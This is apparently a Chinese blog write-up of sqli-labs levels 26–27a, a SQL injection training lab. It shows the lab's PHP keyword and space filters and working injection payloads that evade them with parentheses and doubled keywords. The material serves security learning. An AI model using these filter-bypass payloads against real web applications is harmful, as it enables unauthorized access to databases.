sqli labs 6
2016-10-16 14:23
239 查看
1. 题目26
这个题目还可以进行深入的研究一下
1. 题目26a
3.题目27:
4.题目27a:
当id=1时,页面报错: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 所以我猜测sql语句是:select * from table where id='1' limit 0,1; 通过几次尝试,发现过滤了一些字符,比如:-- ,空格 # or and 考虑过滤了空格则构造的sql语句可以是: id=1'or'1,页面正常显示了,接下来就是考虑如何读取数据库中的数据,接着来构造我们的sql语句: id=1'oORr(select(concat((select(count(id))from(userse)),'')))='123 页面报错,Table 'security.userse' doesn't exist
这个题目还可以进行深入的研究一下
1. 题目26a
查看源代码: $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 因为在代码中过滤了一些字符串,or and -- space(空格) # / 经过一些实验表面:-- # 一定会被过滤了 所以重点还是回到了如何构造sql语句而且没有过滤 id=-1')oORr(select(concat((select(count(id))from(users)),'')))>('0 页面正常显示,显示 Your Login name:Dumb Your Password:Dumb 当id=-1')oORr(select(concat((select(count(id))from(useras)),'')))>('0 页面没有正常显示,就是没有显示Your Password:Dumb ok,sql注入语句就是:-1')oORr(select(concat((select(count(id))from(useras)),'')))>('0
3.题目27:
输入id=1,页面正常显示 输入id=1',页面报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''12'' LIMIT 0,1' at line 1 还原sql,语句:select * from table where id='1' limit 0,1; 尝试id=1' or 1=1 #--+ 发现代码过滤了空格,和-- 我去看一一下源代码,发现过滤了很多字符串: $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out select 根据过滤了这些字符串,构造sql语句: id=-1'or(selseselectlectect(count(id))from(users))>'0,页面正常显示,Your Login name:Dumb Your Password:Dumb 构造id=-1'or(selseselectlectect(count(id))from(users3))>'0,页面显示数据库错误, Table 'security.us3ers' doesn't exist 想要继续获取信息,就接着注入吧!!!
4.题目27a:
输入id=1,页面正常显示!!! 输入id=1" 页面显示异常 构造sql语句,id=-1"or(selseselectlectect(count(id))from(users3))>"0,页面显示异常, -1"or(selseselectlectect(count(id))from(users))>"0,页面正常显示。 这一题和上一题很相似,只不过是不显示数据库错误
相关文章推荐
- ④sqlilabs的less-3和less-4
- Sqli-labs less 46
- Sqli-labs less 12
- SQLi Labs Lesson22
- SQLi-Labs 学习笔记(Less 1-10)
- sqli labs 4
- sqli labs 5
- SQL注入之手工注入sqli-labs-master
- Sqli-labs less 65
- Sqli-labs less 45
- Sqli-labs less 31
- 【SQL注入之sqli-labs】Less 1 - Less 5 练习笔记
- Sqli-LABS通关笔录-12
- Sqli-labs less 64
- SQL注入练习平台sqli-labs
- Sqli-labs less 44
- Sqli-labs less 29
- Sqli-labs less 9
- SQLi Labs Lesson20
- Sqli-labs学习SQL注入-Lesson 1-10总结